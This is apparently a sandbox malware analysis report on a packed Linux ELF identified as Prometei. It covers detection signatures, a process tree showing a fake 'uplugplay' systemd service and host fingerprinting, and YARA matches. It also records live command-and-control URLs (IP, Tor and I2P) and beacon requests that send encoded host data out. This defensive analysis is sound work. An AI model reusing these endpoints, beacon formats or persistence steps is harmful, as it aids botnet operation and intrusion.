Create Interactive Tour

Linux Analysis Report
na.elf

Overview

General Information

Sample name:na.elf
Analysis ID:1649062
MD5:17c890ce6d35f2b8172c163319181902
SHA1:6e0a1278c0028019a60c9a12215f1dfd79ed6c17
SHA256:bed0317927ad47d69e96ce6f9b95f8e53495c6d99de4fb770f388627f3590f05
Tags:elfuser-abuse_ch
Infos:

Detection

Prometei
Score:100
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Prometei
Drops files in suspicious directories
Executes the "dmidecode" command for reading DMI BIOS info like hardware or serial numbers (indicative of machine fingerprinting or VM-detection)
Found Tor onion address
Sample deletes itself
Sample is packed with UPX
Creates hidden files and/or directories
ELF contains segments with high entropy indicating compressed/encrypted content
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "pgrep" command search for and/or send signals to processes
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
Executes the "uname" command used to read OS and architecture name
HTTP GET or POST without a user agent
Reads CPU information from /proc indicative of miner or evasive malware
Reads CPU information from /sys indicative of miner or evasive malware
Reads system information from the proc file system
Sample contains only a LOAD segment without any section mappings
Sample listens on a socket
Sample tries to set the executable flag
Suricata IDS alerts with low severity for network traffic
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1649062
Start date and time:2025-03-26 13:43:23 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 8s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:na.elf
Detection:MAL
Classification:mal100.troj.evad.linELF@0/5@0/0
  • VT rate limit hit for: http://152.36.128.18/cgi-bin/p.cgi?r=21&i=G9IF15IMR51KTWGR
Command:/tmp/na.elf
PID:6231
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Starting...
System install...OK
Standard Error:Created symlink /etc/systemd/system/multi-user.target.wants/uplugplay.service /lib/systemd/system/uplugplay.service.
  • system is lnxubuntu20
  • na.elf (PID: 6231, Parent: 6149, MD5: 17c890ce6d35f2b8172c163319181902) Arguments: /tmp/na.elf
    • na.elf New Fork (PID: 6234, Parent: 6231)
    • sh (PID: 6234, Parent: 6231, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep na.elf"
      • sh New Fork (PID: 6235, Parent: 6234)
      • pgrep (PID: 6235, Parent: 6234, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep na.elf
    • na.elf New Fork (PID: 6238, Parent: 6231)
    • sh (PID: 6238, Parent: 6231, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof na.elf"
      • sh New Fork (PID: 6239, Parent: 6238)
      • pidof (PID: 6239, Parent: 6238, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof na.elf
    • na.elf New Fork (PID: 6242, Parent: 6231)
    • sh (PID: 6242, Parent: 6231, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep uplugplay"
      • sh New Fork (PID: 6243, Parent: 6242)
      • pgrep (PID: 6243, Parent: 6242, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep uplugplay
    • na.elf New Fork (PID: 6248, Parent: 6231)
    • sh (PID: 6248, Parent: 6231, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep upnpsetup"
      • sh New Fork (PID: 6249, Parent: 6248)
      • pgrep (PID: 6249, Parent: 6248, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep upnpsetup
    • na.elf New Fork (PID: 6252, Parent: 6231)
    • sh (PID: 6252, Parent: 6231, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof upnpsetup"
      • sh New Fork (PID: 6253, Parent: 6252)
      • pidof (PID: 6253, Parent: 6252, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof upnpsetup
    • na.elf New Fork (PID: 6256, Parent: 6231)
    • sh (PID: 6256, Parent: 6231, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload"
      • sh New Fork (PID: 6257, Parent: 6256)
      • systemctl (PID: 6257, Parent: 6256, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
    • na.elf New Fork (PID: 6273, Parent: 6231)
    • sh (PID: 6273, Parent: 6231, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable uplugplay.service"
      • sh New Fork (PID: 6274, Parent: 6273)
      • systemctl (PID: 6274, Parent: 6273, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable uplugplay.service
    • na.elf New Fork (PID: 6278, Parent: 6231)
    • sh (PID: 6278, Parent: 6231, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl start uplugplay.service"
      • sh New Fork (PID: 6279, Parent: 6278)
      • systemctl (PID: 6279, Parent: 6278, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start uplugplay.service
  • systemd New Fork (PID: 6259, Parent: 6258)
  • snapd-env-generator (PID: 6259, Parent: 6258, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 6276, Parent: 6275)
  • snapd-env-generator (PID: 6276, Parent: 6275, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 6282, Parent: 1)
  • uplugplay (PID: 6282, Parent: 1, MD5: 17c890ce6d35f2b8172c163319181902) Arguments: /usr/sbin/uplugplay
    • uplugplay New Fork (PID: 6283, Parent: 6282)
      • sh (PID: 6284, Parent: 6283, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/usr/sbin/uplugplay -Dcomsvc"
        • sh New Fork (PID: 6285, Parent: 6284)
        • uplugplay (PID: 6285, Parent: 6284, MD5: 17c890ce6d35f2b8172c163319181902) Arguments: /usr/sbin/uplugplay -Dcomsvc
          • sh (PID: 6289, Parent: 6285, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c hostnamectl
            • sh New Fork (PID: 6290, Parent: 6289)
            • hostnamectl (PID: 6290, Parent: 6289, MD5: b1245aa6d3c28b5d5fedb2d681d32eb9) Arguments: hostnamectl
          • sh (PID: 6293, Parent: 6285, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c hostnamectl
            • sh New Fork (PID: 6294, Parent: 6293)
            • hostnamectl (PID: 6294, Parent: 6293, MD5: b1245aa6d3c28b5d5fedb2d681d32eb9) Arguments: hostnamectl
          • sh (PID: 6428, Parent: 6285, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 6429, Parent: 6428)
            • dmidecode (PID: 6429, Parent: 6428, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 6432, Parent: 6285, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c uptime
            • sh New Fork (PID: 6433, Parent: 6432)
            • uptime (PID: 6433, Parent: 6432, MD5: 3ad70d8e33316ac713bf25c2ddf2fb14) Arguments: uptime
          • sh (PID: 6436, Parent: 6285, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "uname -a"
            • sh New Fork (PID: 6437, Parent: 6436)
            • uname (PID: 6437, Parent: 6436, MD5: 4ac7c634c5bec95753c480e9d421dcc2) Arguments: uname -a
          • sh (PID: 6442, Parent: 6285, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c dmidecode
            • sh New Fork (PID: 6443, Parent: 6442)
            • dmidecode (PID: 6443, Parent: 6442, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode
          • sh (PID: 6454, Parent: 6285, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c uptime
            • sh New Fork (PID: 6455, Parent: 6454)
            • uptime (PID: 6455, Parent: 6454, MD5: 3ad70d8e33316ac713bf25c2ddf2fb14) Arguments: uptime
          • sh (PID: 6458, Parent: 6285, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "uname -a"
            • sh New Fork (PID: 6459, Parent: 6458)
            • uname (PID: 6459, Parent: 6458, MD5: 4ac7c634c5bec95753c480e9d421dcc2) Arguments: uname -a
  • systemd New Fork (PID: 6295, Parent: 1)
  • systemd-hostnamed (PID: 6295, Parent: 1, MD5: 2cc8a5576629a2d5bd98e49a4b8bef65) Arguments: /lib/systemd/systemd-hostnamed
  • dash New Fork (PID: 6508, Parent: 4332)
  • rm (PID: 6508, Parent: 4332, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.ajzlkUCIfc /tmp/tmp.ZSyPQjSoeH /tmp/tmp.jOXLM2DV0E
  • dash New Fork (PID: 6509, Parent: 4332)
  • rm (PID: 6509, Parent: 4332, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.ajzlkUCIfc /tmp/tmp.ZSyPQjSoeH /tmp/tmp.jOXLM2DV0E
  • cleanup
SourceRuleDescriptionAuthorStrings
na.elfLinux_Trojan_Dofloo_ac3333d1unknownunknown
  • 0x5bcdb:$a: 76 77 78 95 5C C9 95 79 7A C9 95 5C C9 41 42 43 5C C9 95 5C 44 45
SourceRuleDescriptionAuthorStrings
/usr/sbin/uplugplayLinux_Trojan_Dofloo_ac3333d1unknownunknown
  • 0x5bcdb:$a: 76 77 78 95 5C C9 95 79 7A C9 95 5C C9 41 42 43 5C C9 95 5C 44 45
SourceRuleDescriptionAuthorStrings
6231.1.0000000000401000.00000000004f9000.r-x.sdmpLinux_Hacktool_Flooder_1a4eb229unknownunknown
  • 0x9beb:$a: F4 8B 45 E8 83 C0 01 89 45 F8 EB 0F 8B 45 E8 83 C0 01 89 45 F4 8B
6231.1.0000000000401000.00000000004f9000.r-x.sdmpLinux_Hacktool_Flooder_f454ec10unknownunknown
  • 0xb569:$a: 8B 45 EC 48 63 D0 48 8B 45 D0 48 01 D0 0F B6 00 3C 2E 75 4D 8B
6231.1.000000000052d000.0000000001575000.rw-.sdmpLinux_Trojan_Dofloo_ac3333d1unknownunknown
  • 0x7190db:$a: 76 77 78 95 5C C9 95 79 7A C9 95 5C C9 41 42 43 5C C9 95 5C 44 45
Process Memory Space: na.elf PID: 6231JoeSecurity_PrometeiYara detected PrometeiJoe Security
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-03-26T13:44:24.316436+010028033053Unknown Traffic192.168.2.2358316152.36.128.1880TCP
    2025-03-26T13:44:35.169036+010028033053Unknown Traffic192.168.2.2358320152.36.128.1880TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: na.elfAvira: detected
    Source: /usr/sbin/uplugplayAvira: detection malicious, Label: LINUX/GM.Agent.JQ
    Source: na.elfReversingLabs: Detection: 47%

    Bitcoin Miner

    barindex
    Source: Yara matchFile source: Process Memory Space: na.elf PID: 6231, type: MEMORYSTR
    Source: /usr/sbin/uplugplay (PID: 6285)Reads CPU info from proc file: /proc/cpuinfoJump to behavior
    Source: /usr/bin/pgrep (PID: 6235)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6249)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/sbin/uplugplay (PID: 6285)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/bin/uptime (PID: 6433)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/bin/uptime (PID: 6455)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior

    Networking

    barindex
    Source: na.elf, 6231.1.000000000052d000.0000000001575000.rw-.sdmpString found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
    Source: na.elf, 6231.1.000000000052d000.0000000001575000.rw-.sdmpString found in binary or memory: nNhttp://152.36.128.18/cgi-bin/p.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi/usr/sbin/uplugplay/etc/uplugplay/etc/CommIdcrashed.dump/usr/sbin//etc/msdtcmsdtc2msdtc3/etc/pcc0/etc/pcc1pbdebug
    Source: global trafficHTTP traffic detected: GET /cgi-bin/p.cgi?r=21&i=G9IF15IMR51KTWGR HTTP/1.0Host: 152.36.128.18
    Source: global trafficHTTP traffic detected: GET /cgi-bin/p.cgi?add=aW5mbyB7DQp2NC4wMlZfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCjMwNjQyOTYga0INCg0KDQoNCg0KVWJ1bnR1ICYgMjAuMDQuMiBMVFMgKEZvY2FsIEZvc3NhKSAgJiBidWxsc2V5ZS9zaWQgJiANCg0KL3Vzci9zYmluLw0KIDA3OjQ0OjMzIHVwIDcgbWluLCAgMSB1c2VyLCAgbG9hZCBhdmVyYWdlOiAyLjY3LCAxLjIxLCAwLjQ5fDE3NDI5OTMwNzMNCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=G9IF15IMR51KTWGR&h=galassia&enckey=pwLFR7mvEs4SdxFgc8SCmiJyf+tHzvw1SRJIyIFluNdteMM16R9ReMywiG7HPh3l4ACL3QWuYNWfE9W80VMTXWYQpFA6Zg+yoARVKjiPAGpz+Mt1Obwt0QrRsbkzG5LkszjBEyQd9+3bw2o7ZVabSkzjFkBf/bHQnpwuBUexuGA= HTTP/1.0Host: 152.36.128.18
    Source: /usr/sbin/uplugplay (PID: 6285)Socket: 0.0.0.0:89Jump to behavior
    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.23:58320 -> 152.36.128.18:80
    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.23:58316 -> 152.36.128.18:80
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
    Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
    Source: unknownTCP traffic detected without corresponding DNS query: 152.36.128.18
    Source: unknownTCP traffic detected without corresponding DNS query: 152.36.128.18
    Source: unknownTCP traffic detected without corresponding DNS query: 152.36.128.18
    Source: unknownTCP traffic detected without corresponding DNS query: 152.36.128.18
    Source: unknownTCP traffic detected without corresponding DNS query: 152.36.128.18
    Source: unknownTCP traffic detected without corresponding DNS query: 152.36.128.18
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
    Source: unknownTCP traffic detected without corresponding DNS query: 34.249.145.219
    Source: unknownTCP traffic detected without corresponding DNS query: 34.249.145.219
    Source: unknownTCP traffic detected without corresponding DNS query: 34.249.145.219
    Source: unknownTCP traffic detected without corresponding DNS query: 152.36.128.18
    Source: unknownTCP traffic detected without corresponding DNS query: 152.36.128.18
    Source: unknownTCP traffic detected without corresponding DNS query: 152.36.128.18
    Source: unknownTCP traffic detected without corresponding DNS query: 152.36.128.18
    Source: unknownTCP traffic detected without corresponding DNS query: 152.36.128.18
    Source: unknownTCP traffic detected without corresponding DNS query: 152.36.128.18
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
    Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
    Source: unknownTCP traffic detected without corresponding DNS query: 34.249.145.219
    Source: global trafficHTTP traffic detected: GET /cgi-bin/p.cgi?r=21&i=G9IF15IMR51KTWGR HTTP/1.0Host: 152.36.128.18
    Source: global trafficHTTP traffic detected: GET /cgi-bin/p.cgi?add=aW5mbyB7DQp2NC4wMlZfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCjMwNjQyOTYga0INCg0KDQoNCg0KVWJ1bnR1ICYgMjAuMDQuMiBMVFMgKEZvY2FsIEZvc3NhKSAgJiBidWxsc2V5ZS9zaWQgJiANCg0KL3Vzci9zYmluLw0KIDA3OjQ0OjMzIHVwIDcgbWluLCAgMSB1c2VyLCAgbG9hZCBhdmVyYWdlOiAyLjY3LCAxLjIxLCAwLjQ5fDE3NDI5OTMwNzMNCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=G9IF15IMR51KTWGR&h=galassia&enckey=pwLFR7mvEs4SdxFgc8SCmiJyf+tHzvw1SRJIyIFluNdteMM16R9ReMywiG7HPh3l4ACL3QWuYNWfE9W80VMTXWYQpFA6Zg+yoARVKjiPAGpz+Mt1Obwt0QrRsbkzG5LkszjBEyQd9+3bw2o7ZVabSkzjFkBf/bHQnpwuBUexuGA= HTTP/1.0Host: 152.36.128.18
    Source: na.elf, uplugplay.12.drString found in binary or memory: http://152.36.128
    Source: na.elf, 6231.1.000000000052d000.0000000001575000.rw-.sdmpString found in binary or memory: http://152.36.128.18/cgi-bin/p.cgi
    Source: na.elf, 6231.1.000000000052d000.0000000001575000.rw-.sdmpString found in binary or memory: http://152.36.128.18/cgi-bin/p.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.oni
    Source: na.elf, 6231.1.000000000052d000.0000000001575000.rw-.sdmpString found in binary or memory: http://dummy.zero/cgi-bin/prometei.cgi
    Source: na.elf, 6231.1.000000000052d000.0000000001575000.rw-.sdmpString found in binary or memory: http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi
    Source: na.elf, uplugplay.12.drString found in binary or memory: http://upx.sf.net
    Source: na.elf, 6231.1.000000000052d000.0000000001575000.rw-.sdmpString found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
    Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39256
    Source: unknownNetwork traffic detected: HTTP traffic on port 39256 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

    System Summary

    barindex
    Source: na.elf, type: SAMPLEMatched rule: Linux_Trojan_Dofloo_ac3333d1 Author: unknown
    Source: 6231.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORYMatched rule: Linux_Hacktool_Flooder_1a4eb229 Author: unknown
    Source: 6231.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORYMatched rule: Linux_Hacktool_Flooder_f454ec10 Author: unknown
    Source: 6231.1.000000000052d000.0000000001575000.rw-.sdmp, type: MEMORYMatched rule: Linux_Trojan_Dofloo_ac3333d1 Author: unknown
    Source: /usr/sbin/uplugplay, type: DROPPEDMatched rule: Linux_Trojan_Dofloo_ac3333d1 Author: unknown
    Source: LOAD without section mappingsProgram segment: 0x400000
    Source: na.elf, type: SAMPLEMatched rule: Linux_Trojan_Dofloo_ac3333d1 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 04664dc5ea14ddff5301e66c46d6795f1582c148b5cb621248424d015245c95e, license = Elastic License v2, threat_name = Linux.Trojan.Dofloo, fingerprint = a8f360e2a545e65b5f9f2273715c1a5008a0fe4f88f6e14becd6e69158aab409, id = ac3333d1-df88-459b-a411-00b4fc947f3f, last_modified = 2022-01-26
    Source: 6231.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORYMatched rule: Linux_Hacktool_Flooder_1a4eb229 reference_sample = bf6f3ffaf94444a09b69cbd4c8c0224d7eb98eb41514bdc3f58c1fb90ac0e705, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Hacktool.Flooder, fingerprint = de076ef23c2669512efc00ddfe926ef04f8ad939061c69131a0ef9a743639371, id = 1a4eb229-a194-46a5-8e93-370a40ba999b, last_modified = 2021-09-16
    Source: 6231.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORYMatched rule: Linux_Hacktool_Flooder_f454ec10 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 0297e1ad6e180af85256a175183102776212d324a2ce0c4f32e8a44a2e2e9dad, license = Elastic License v2, threat_name = Linux.Hacktool.Flooder, fingerprint = 2ae5e2c3190a4ce5d238efdb10ac0520987425fb7af52246b6bf948abd0259da, id = f454ec10-7a67-4717-9e95-fecb7c357566, last_modified = 2022-01-26
    Source: 6231.1.000000000052d000.0000000001575000.rw-.sdmp, type: MEMORYMatched rule: Linux_Trojan_Dofloo_ac3333d1 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 04664dc5ea14ddff5301e66c46d6795f1582c148b5cb621248424d015245c95e, license = Elastic License v2, threat_name = Linux.Trojan.Dofloo, fingerprint = a8f360e2a545e65b5f9f2273715c1a5008a0fe4f88f6e14becd6e69158aab409, id = ac3333d1-df88-459b-a411-00b4fc947f3f, last_modified = 2022-01-26
    Source: /usr/sbin/uplugplay, type: DROPPEDMatched rule: Linux_Trojan_Dofloo_ac3333d1 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 04664dc5ea14ddff5301e66c46d6795f1582c148b5cb621248424d015245c95e, license = Elastic License v2, threat_name = Linux.Trojan.Dofloo, fingerprint = a8f360e2a545e65b5f9f2273715c1a5008a0fe4f88f6e14becd6e69158aab409, id = ac3333d1-df88-459b-a411-00b4fc947f3f, last_modified = 2022-01-26
    Source: classification engineClassification label: mal100.troj.evad.linELF@0/5@0/0

    Data Obfuscation

    barindex
    Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
    Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
    Source: initial sampleString containing UPX found: $Id: UPX 4.24 Copyright (C) 1996-2024 the UPX Team. All Rights Reserved. $
    Source: /usr/bin/pidof (PID: 6239)Directory: //.Jump to behavior
    Source: /usr/bin/pidof (PID: 6253)Directory: //.Jump to behavior
    Source: /lib/systemd/systemd-hostnamed (PID: 6295)Directory: <invalid fd (10)>/..Jump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/6231/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/6231/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/6234/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/6234/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/1582/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/1582/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/3088/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/3088/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/230/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/230/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/110/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/110/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/231/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/231/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/111/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/111/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/232/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/232/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/1579/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/1579/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/112/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/112/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/233/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/233/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/1699/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/1699/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/113/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/113/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/234/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/234/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/1335/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/1335/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/1698/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/1698/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/114/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/114/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/235/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/235/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/1334/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/1334/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/1576/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/1576/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/2302/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/2302/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/115/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/115/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/236/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/236/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/116/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/116/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/237/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/237/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/117/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/117/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/118/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/118/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/910/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/910/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/119/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/119/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/912/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/912/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/10/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/10/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/2307/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/2307/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/11/statusJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/11/cmdlineJump to behavior
    Source: /usr/bin/pgrep (PID: 6243)File opened: /proc/918/statusJump to behavior
